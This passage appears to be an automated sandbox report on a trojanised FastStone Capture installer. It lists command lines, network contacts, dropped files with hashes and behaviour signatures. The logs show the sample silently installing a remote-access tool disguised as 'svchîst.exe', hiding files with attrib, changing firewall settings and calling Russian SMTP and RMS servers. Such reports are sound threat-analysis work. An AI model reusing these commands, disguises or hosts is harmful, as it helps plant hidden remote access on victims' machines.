762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /silentinstall
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /firewall
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /start
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.cmd"
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
Network
| Country | Destination | Domain | Proto |
| US | 20.42.72.131:443 | tcp | |
| NL | 104.110.191.140:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 204.79.197.203:80 | tcp | |
| US | 13.107.21.200:443 | tcp | |
| US | 8.8.8.8:53 | smtp.spaceweb.ru | udp |
| RU | 77.222.41.129:25 | smtp.spaceweb.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| RU | 109.234.156.179:5655 | tcp |
Files
memory/4120-130-0x0000000000000000-mapping.dmp
memory/4916-131-0x0000000000000000-mapping.dmp
memory/4220-133-0x0000000000000000-mapping.dmp
memory/3088-132-0x0000000000000000-mapping.dmp
memory/2588-134-0x0000000000000000-mapping.dmp
memory/2292-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
| MD5 | d11ab72ad73808bea3acf250e78c1d50 |
| SHA1 | b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7 |
| SHA256 | b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b |
| SHA512 | fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31 |
C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
| MD5 | d11ab72ad73808bea3acf250e78c1d50 |
| SHA1 | b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7 |
| SHA256 | b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b |
| SHA512 | fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31 |
memory/4672-138-0x0000000000000000-mapping.dmp
memory/5040-139-0x0000000000000000-mapping.dmp
memory/4344-140-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsExec.dll
| MD5 | f27689c513e7d12c7c974d5f8ef710d6 |
| SHA1 | e305f2a2898d765a64c82c449dfb528665b4a892 |
| SHA256 | 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47 |
| SHA512 | 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc |
memory/5004-142-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsExec.dll
| MD5 | f27689c513e7d12c7c974d5f8ef710d6 |
| SHA1 | e305f2a2898d765a64c82c449dfb528665b4a892 |
| SHA256 | 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47 |
| SHA512 | 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc |
memory/624-144-0x0000000000000000-mapping.dmp
memory/1304-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll
| MD5 | 8cf2ac271d7679b1d68eefc1ae0c5618 |
| SHA1 | 7cc1caaa747ee16dc894a600a4256f64fa65a9b8 |
| SHA256 | 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba |
| SHA512 | ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3 |
C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsProcess.dll
| MD5 | f0438a894f3a7e01a4aae8d1b5dd0289 |
| SHA1 | b058e3fcfb7b550041da16bf10d8837024c38bf6 |
| SHA256 | 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11 |
| SHA512 | f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7 |
memory/5092-158-0x0000000000000000-mapping.dmp
memory/4780-159-0x0000000000000000-mapping.dmp
memory/1240-160-0x0000000000000000-mapping.dmp
memory/832-161-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
C:\Windows\SysWOW64\drivers\install.exe
| MD5 | 1cd9ee0406b9a04672fdd385ca7631ce |
| SHA1 | 5b3b49cd7906676ad46a7b7d192967df6c9ea505 |
| SHA256 | 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8 |
| SHA512 | 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7 |
memory/3588-164-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\FastStone Capture\FSCapture.exe
| MD5 | 1eceb7f17d041444ea91fcb5a3272c3e |
| SHA1 | 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f |
| SHA256 | d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929 |
| SHA512 | 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
C:\Program Files (x86)\FastStone Capture\FSCapture.exe
| MD5 | 1eceb7f17d041444ea91fcb5a3272c3e |
| SHA1 | 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f |
| SHA256 | d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929 |
| SHA512 | 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d |
C:\Program Files (x86)\FastStone Capture\FSCapture.ENU
| MD5 | a34680a3a79746aa2851f53ee970fed9 |
| SHA1 | 88b31d3753012e3c8ed3806aa9fb45bb39091584 |
| SHA256 | 9942d2e76602e3c3ffd2f2a6a124d2f768a361e46ba28f407604e77742ebc9dd |
| SHA512 | cd0334613f0044aae24fb76812752e2e5c94a330d689230adedd2b625db4abedc57a8d216720b7c21784926df7e88cb891883671318f6001951946f418196ea7 |
memory/3924-169-0x0000000000000000-mapping.dmp
memory/1152-170-0x0000000000000000-mapping.dmp
memory/1860-171-0x0000000000000000-mapping.dmp
memory/4276-172-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
C:\Users\Admin\AppData\Roaming\FastStone\FSC\fsc.db
| MD5 | a979f58d3ece3f44d6572a44efb4a0cc |
| SHA1 | 2ac4dbb1994f4b3ef9c13445734f9c16843b140b |
| SHA256 | 9ebc76ead646faf16af6605a7d7a8a5c5a3ccf9b9e2ca6628381a5da2b26a87e |
| SHA512 | 9bbe07357c6ec4e7eb66acb4b068e1dccd4d73b7fd88d07a4c664ea4501bf3e581bdfe3a221a187ef242570a8733eef5b5227c14f365b1fd79a4f40a17c1c471 |
memory/3816-176-0x0000000000000000-mapping.dmp
memory/4472-175-0x0000000000000000-mapping.dmp
memory/1820-178-0x0000000000000000-mapping.dmp
memory/452-177-0x0000000000000000-mapping.dmp
memory/2424-180-0x0000000000000000-mapping.dmp
memory/3904-179-0x0000000000000000-mapping.dmp
memory/2516-181-0x0000000000000000-mapping.dmp
memory/4440-182-0x0000000000000000-mapping.dmp
memory/4348-184-0x0000000000000000-mapping.dmp
memory/388-183-0x0000000000000000-mapping.dmp
memory/5096-185-0x0000000000000000-mapping.dmp
memory/1756-186-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
memory/4584-192-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
memory/1120-196-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
memory/2252-204-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\idfgvgjnghcdfb.reg
| MD5 | 7b5e1d30e89e0ef1c86fecb977131673 |
| SHA1 | 78df83f3256df2efbe483d182d4cc13afe99be2b |
| SHA256 | b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80 |
| SHA512 | eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719 |
memory/1940-206-0x0000000000000000-mapping.dmp
memory/3768-207-0x0000000000000000-mapping.dmp
memory/3900-208-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\svchîst.exe
| MD5 | a6fcc7dd9a6e029c921555b1de6fd586 |
| SHA1 | a889c079a86d600896e14973ba5775b6b1f6ac60 |
| SHA256 | 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe |
| SHA512 | 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb |
memory/1612-209-0x0000000000000000-mapping.dmp
C:\Windows\SysWOW64\drivers\ssleay32.dll
| MD5 | 5c268ca919854fc22d85f916d102ee7f |
| SHA1 | 0957cf86e0334673eb45945985b5c033b412be0e |
| SHA256 | 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56 |
| SHA512 | 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310 |
C:\Windows\SysWOW64\drivers\libeay32.dll
| MD5 | 4cb2e1b9294ddae1bf7dcaaf42b365d1 |
| SHA1 | a225f53a8403d9b73d77bcbb075194520cce5a14 |
| SHA256 | a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884 |
| SHA512 | 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb |
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-27 17:37
Reported
2022-04-27 19:29
Platform
win7-20220414-en
Max time kernel
150s
Max time network
174s
Command Line
Signatures
RMS
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Loads dropped DLL
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\attrib.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\FastStone Capture\FSCaptureHelp.chm | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSCrossHair.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSLogo.png | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSRecorder.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSRecorder.LANG | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSCapture.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
| File created | C:\Program Files (x86)\FastStone Capture\FSFocus.exe | C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe | N/A |
